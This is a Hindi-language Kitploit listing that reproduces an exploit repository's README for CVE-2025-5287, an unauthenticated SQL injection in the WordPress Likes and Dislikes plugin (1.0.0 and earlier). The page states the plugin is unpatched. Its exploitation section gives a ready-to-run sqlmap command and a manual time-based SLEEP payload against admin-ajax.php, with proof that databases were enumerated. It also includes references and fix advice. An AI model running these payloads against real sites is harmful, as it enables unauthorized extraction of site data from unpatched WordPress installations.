Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-5287 — WordPress Likes and Dislikes Plugin <= 1.0.0 SQL Injection के लिए असुरक्षित है | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-5287
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2025-5287

CVE-2025-5287

WordPress Likes and Dislikes Plugin <= 1.0.0 SQL Injection के लिए असुरक्षित है

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔥 WordPress Likes and Dislikes Plugin ≤ 1.0.0 - बिना प्रमाणीकरण के SQL इंजेक्शन

🧠 CVE ID: CVE-2025-5287

द्वारा खोजा गया: Khaled_Alenazi (Nxploited)   प्रकाशित तिथि: 27 May, 2025


📋 विवरण

WordPress के लिए Likes and Dislikes Plugin सभी संस्करणों 1.0.0 तक में post पैरामीटर के माध्यम से SQL इंजेक्शन के लिए संवेदनशील है।   अपर्याप्त एस्केपिंग और प्रिपेयर्ड स्टेटमेंट्स की कमी के कारण, बिना प्रमाणीकरण के हमलावर बैकएंड क्वेरी में कच्चा SQL इंजेक्ट कर सकते हैं, जिससे डेटा रिसाव या हेरफेर हो सकता है।


🧬 तकनीकी विवरण

  • कमजोर पैरामीटर: post
  • कमजोरी का प्रकार: SQL इंजेक्शन (बूलियन-आधारित और समय-आधारित)
  • HTTP विधि: POST
  • प्रभावित एंडपॉइंट: /wp-admin/admin-ajax.php
  • पैच स्थिति: ❌ ठीक नहीं किया गया
  • आवश्यक विशेषाधिकार: कोई नहीं (बिना प्रमाणीकरण)
  • CVSS स्कोर: 9.3 (उच्च)
  • OWASP शीर्ष 10: A1 - इंजेक्शन

  • 💥 शोषण

    ✅ SQLMap कमांड (समय-आधारित ब्लाइंड SQLi):

    root@kitploit:~
    sqlmap -u "http://TARGET/wp-admin/admin-ajax.php" \
    --data "action=my_likes_dislikes_action&post=1&state=like" \
    --method POST --risk 3 --level 5 --batch --time-sec=5 --dbs
    

    यह कमांड इंजेक्शन पॉइंट की पुष्टि करता है और समय-आधारित तकनीक का उपयोग करके डेटाबेस की गणना करता है।

    🧪 POC पेलोड (मैनुअल - समय-आधारित):

    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: nxploit.ddev.site
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    
    action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)&state=like
    

    🧪 साक्ष्य सारांश

    1. SQLMap गणना:    - बूलियन-आधारित ब्लाइंड और समय-आधारित ब्लाइंड SQLi का पता लगाया।    - पुष्टि की गई कि बैकएंड MySQL है।    - गणना किए गए डेटाबेस: db, test, information_schema।

       SQLMap Proof

    1. Burp Suite के साथ मैन्युअल सत्यापन:    - समय-आधारित पेलोड के माध्यम से HTTP प्रतिक्रिया विलंब की पुष्टि की गई।    - विलंब 15 सेकंड से अधिक हो गया, जो वास्तविक इंजेक्शन का संकेत है।

       Burp Suite Proof


    ⚠️ जोखिम

    • CVSS गंभीरता: 9.3 (उच्च)
    • इस कमजोरी का उपयोग बिना प्रमाणीकरण के संवेदनशील डेटा निकालने के लिए किया जा सकता है।

    🔗 संदर्भ

    • https://patchstack.com/database/wordpress/plugin/inprosysmedia-likes-dislikes-post/vulnerability/wordpress-likes-and-dislikes-plugin-plugin-1-0-0-unauthenticated-sql-injection-vulnerability
    • https://nvd.nist.gov/vuln/detail/CVE-2025-5287

    🛡️ अनुशंसाएँ

    • तुरंत post से इनपुट को सैनिटाइज़ और पैरामीटराइज़ करें।
    • प्रिपेयर्ड स्टेटमेंट्स का उपयोग करें।
    • ब्रूट-फोर्स इंजेक्शन प्रयासों को कम करने के लिए WAF और रेट-लिमिटिंग लागू करें।

    ⚠️ अस्वीकरण

    यह सामग्री केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान की गई है।   लेखक स्पष्ट प्राधिकरण के बिना दुर्भावनापूर्ण गतिविधि या सिस्टम के शोषण का समर्थन नहीं करता है।


    👤 लेखक

    Khaled_Alenazi (Nxploited)

    टूल डाउनलोड करें